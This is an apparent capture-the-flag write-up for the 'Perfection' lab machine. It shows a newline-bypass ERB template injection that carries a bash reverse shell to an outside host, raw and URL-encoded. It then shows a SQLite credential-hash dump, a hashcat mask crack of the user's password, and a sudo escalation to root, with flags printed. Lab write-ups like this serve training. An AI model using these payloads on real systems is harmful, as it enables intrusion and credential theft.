Perfection
Recon
HTTP (80)
Website allows us to calculate weights:
Headers:
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 16:37:00 GMT
Content-Type: text/html;charset=utf-8
Connection: close
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Server: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
Content-Length: 5304The server seems to be running Ruby. If we try any symbols inside the fields we get Malicious character detected.
After playing around with parameter it seems like logic of code checks only first line with some kind of regex, injecting new line and SSTI payload shows result:
Reverse Shell
URL encode reverse shell and send:
<%= `bash -c 'exec bash -i &>/dev/tcp/10.10.16.74/4444 <&1'` %>
---
%0A%3C%25%3D%20%60bash%20%2Dc%20%27exec%20bash%20%2Di%20%26%3E%2Fdev%2Ftcp%2F10%2E10%2E16%2E74%2F4444%20%3C%261%27%60%20%25%3E┌──(woyag㉿kraken)-[~/Desktop/Rooms/Perfection]
└─$ pwncat -lp 4444
[12:49:48] Welcome to pwncat 🐈! __main__.py:164
[12:49:55] received connection from 10.10.11.253:44456 bind.py:84
[12:49:58] 10.10.11.253:44456: registered new host w/ db manager.py:957
(local) pwncat$
(remote) susan@perfection:/home/susan/ruby_app$ id
uid=1001(susan) gid=1001(susan) groups=1001(susan),27(sudo)
(remote) susan@perfection:/home/susan/ruby_app$ User.txt
(remote) susan@perfection:/home/susan$ cat user.txt
07bfcbde41110ef6e7077d6ad3ecef4cLinPeas
(remote) susan@perfection:/home/susan$ cd /var/mail
(remote) susan@perfection:/var/mail$ cat susan
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students
in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:
{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}
Note that all letters of the first name should be convered into lowercase.
Please hit me with updates on the migration when you can. I am currently registering our university with the platform.
- Tina, your delightful studentHmmm... I encountered database file but thought it wasn't crackable, so let's get to it!
(remote) susan@perfection:/home/susan/Migration$ ls
pupilpath_credentials.db
(remote) susan@perfection:/home/susan/Migration$ sqlite3 pupilpath_credentials.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .table
users
sqlite> .mode json
sqlite> SELECT * FROM users;
[{"id":1,"name":"Susan Miller","password":"abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f"},
{"id":2,"name":"Tina Smith","password":"dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57"},
{"id":3,"name":"Harry Tyler","password":"d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393"},
{"id":4,"name":"David Lawrence","password":"ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a"},
{"id":5,"name":"Stephen Locke","password":"154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8"}]Since the box has only 1 user Susan we don't need to crack all the hashes.
Using hashcat with attack mode 3 we can crack the hash easily without writing code and making it multithreaded/multiprocessed:
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Perfection]
└─$ hashcat -m 1400 -a 3 password 'susan_nasus_?d?d?d?d?d?d?d?d?d'
...
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
...Root.txt
susan@perfection:~$ sudo -l
[sudo] password for susan:
Matching Defaults entries for susan on perfection:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User susan may run the following commands on perfection:
(ALL : ALL) ALL
susan@perfection:~$ sudo su
root@perfection:/home/susan# cd
root@perfection:~# ls
root.txt
root@perfection:~# cat root.txt
4559e764aba051c61c10ed9abca32dfeLast updated